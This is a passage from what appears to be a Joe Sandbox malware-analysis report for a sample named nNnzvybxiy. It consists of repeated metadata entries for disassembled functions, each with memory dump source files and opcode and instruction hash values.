                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0b9a5c64926b0db1fc015d39bd6f16fda605e1766bc452d13b4a345658113a05
                                                                                                                                                                                                                              • Instruction ID: c2a8de8863734c73d8d9c3e906ec80802a2ffa6d823440701801d2c612014b02
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b9a5c64926b0db1fc015d39bd6f16fda605e1766bc452d13b4a345658113a05
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D191F2A08A9586DB71DF25D448FA97BA4FF80B88F198175EB4E43794DB39D441CB00
                                                                                                                                                                                                                              Function 00007FFB0C700A60 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: cbe9bbfa621d77dea57e6b0165406112bd8e5c6d214bf51f5da938bd5b7aeac0
                                                                                                                                                                                                                              • Instruction ID: 4358928edff39e76fcdb2345e265d79ddcd5621e71587ca8e387dfd8ee6c43ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbe9bbfa621d77dea57e6b0165406112bd8e5c6d214bf51f5da938bd5b7aeac0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24B13AF2E0C682C6E7E98B38D819BB92791FF55798F248232D94E462C1DF7DE4818701
                                                                                                                                                                                                                              Function 00007FFB0C6BE810 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 49ee3f194aa1318bb058b058e81100d3136800df28c828006d98068105b5c518
                                                                                                                                                                                                                              • Instruction ID: 595a73b18c1dd7db1fa9c073c0a2c6a988c3d8e722f39f64fea9f0c6c3d853bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49ee3f194aa1318bb058b058e81100d3136800df28c828006d98068105b5c518
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7B17CB2B08A528AE721CFB1D9446FD37A6BF05788B544135EE0E57B88EF79E446C340
                                                                                                                                                                                                                              Function 00007FFB0C6DB760 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 26be01c31dece2e76e8289bed4ff1a3d0ee02cf873fb57659bf9097e4f8425c4
                                                                                                                                                                                                                              • Instruction ID: 43b20c24f8bf608819d3f654810831ae2b0a54dbc5d11e284b3d647874adf0ce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26be01c31dece2e76e8289bed4ff1a3d0ee02cf873fb57659bf9097e4f8425c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEB140F2E09B8686EB618F35E848BA963A4FF88B84F454436EA4D47758DF38E541C740
                                                                                                                                                                                                                              Function 00007FFB0C69D7F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 236b175780d7f46bd25b512d32050df8cf8b6fd8cc245099ec62e5302b5945cc
                                                                                                                                                                                                                              • Instruction ID: 377ec3ece2ddfc58a35cb165a817d7fc4715caf1894925853df24e0779e6cd94
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 236b175780d7f46bd25b512d32050df8cf8b6fd8cc245099ec62e5302b5945cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76B1AFF2A0878286E7769B66D948B7A73A9FF55B90F004135EB5D43A89DF3CE490C700
                                                                                                                                                                                                                              Function 00007FFB0C678BF0 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2b8bac832d0c650086b4dc42c53d8ace14853648eeee84f5419066bf6c47015c
                                                                                                                                                                                                                              • Instruction ID: 16a5431d85aea43e46d0bb4c0ed6e7d0a1f60fbf10a35a9218cb6e28dd847e94
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b8bac832d0c650086b4dc42c53d8ace14853648eeee84f5419066bf6c47015c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99913F2270C5D10EDB0D8F7DD8A017D3EF1AA8EA19719406EE6CBEA657D53EC686C700
                                                                                                                                                                                                                              Function 00007FFB0C6ECF20 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b28eec96b4380ef9a2f21c612e464b736ee0e67a7e4dedad1db971d69b90961c
                                                                                                                                                                                                                              • Instruction ID: 6630c92927d4a26224136ac2cebb2048d1257b403194c2f32f80875d22a777e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b28eec96b4380ef9a2f21c612e464b736ee0e67a7e4dedad1db971d69b90961c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44A19EF2A187468AEB26CF36E448AA9B7A4FF44784F558036EB8E43654DF3CE445C700
                                                                                                                                                                                                                              Function 00007FFB0C6A4B20 Relevance: .2, Instructions: 229COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 071c24b70f5cbd7195dd42993fdc9672807ef3d9a88019fc5a960ffd462a855e
                                                                                                                                                                                                                              • Instruction ID: d14ffd1ba10582a9f5d1345f7ad7d60000de836caf9e11ece305edc4935c6ec4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 071c24b70f5cbd7195dd42993fdc9672807ef3d9a88019fc5a960ffd462a855e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F917FB7B246408FE318CFB4D451ADD37B2F788748B419129DF06A7B08DB34AA16CB80
                                                                                                                                                                                                                              Function 00007FFB0C6D4CE0 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c6a89dc18ea4a9d0869e7230d4763db27abee8d8773c002f4b02af570902890e
                                                                                                                                                                                                                              • Instruction ID: 985c37c77065b652beea7fdbdb2dd5bf8c2d97f39a516948cc19536869164109
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6a89dc18ea4a9d0869e7230d4763db27abee8d8773c002f4b02af570902890e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D81B4F2E0968386E7669F35E858BB96791FF84B84F055131EA4A47B95DF3CE802C700
                                                                                                                                                                                                                              Function 00007FFB0C72B6B0 Relevance: .2, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b5dbd288d49a495213672b2650cd87f2f45c00111ba0c5e79e6033a279b9f760
                                                                                                                                                                                                                              • Instruction ID: 14f86550f6f196db0d3ff01a74395a9921e10b71766b1f76347c6810d74bc433
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5dbd288d49a495213672b2650cd87f2f45c00111ba0c5e79e6033a279b9f760
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80916EA2B1868587DB58CF3DD10467C77A1FB98B48F54A238DB5E83B41EB38E685C700
                                                                                                                                                                                                                              Function 00007FFB0C6DC650 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0f212ade3e8958b2948aab9627d8d3f87b9a032a6560960e39fd9d3d6f24f1df
                                                                                                                                                                                                                              • Instruction ID: 267e836fe3a94f24d3c23c5f26f08d4d043ce19ee14b73424e55b35d8410e93d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f212ade3e8958b2948aab9627d8d3f87b9a032a6560960e39fd9d3d6f24f1df
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F81DDE2F0968995EB768A25C948F3A6BA1FF88BC4F189035EE4D43754DF38D881D740
                                                                                                                                                                                                                              Function 00007FFB0C69BE10 Relevance: .2, Instructions: 201COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 18083e57824a17161829f0eedd83e2d6a19884e712728e89765a44399dddd317
                                                                                                                                                                                                                              • Instruction ID: 144e0ed3ab48457acb545e5ce54a24027ca155dcaa7a60763a58df5c4c136242
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18083e57824a17161829f0eedd83e2d6a19884e712728e89765a44399dddd317
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C891ADA2A08B8583E725CB29D50827D77A5FBD8B88F199235EF4D43746EF38E5818300
                                                                                                                                                                                                                              Function 00007FFB0C69A530 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6c33824b5e95a59c1c160466e4c4e8e239db09b6634da41c54f7ff6e6eed5a35
                                                                                                                                                                                                                              • Instruction ID: c8465061de1c1cd902bde17c1cac70a3fe543503047584c12dda591129de2ef6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c33824b5e95a59c1c160466e4c4e8e239db09b6634da41c54f7ff6e6eed5a35
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC81D1F3A046819ADB22CF65D454AB9BBE0FB48B80F59C532EB4E47681DF38D495DB00
                                                                                                                                                                                                                              Function 00007FFB0C6E3D70 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                                                                                              • Instruction ID: bd7e19dd55b9734a7888f18f7c8b248fcbfc127ecd612660dea438448eea742b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A151F89361D3C58ADB61CB6DC84476C7AE0EB65B44F588137E689833A2DB3DD906C311
                                                                                                                                                                                                                              Function 00007FFB0C7B0E90 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 139COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
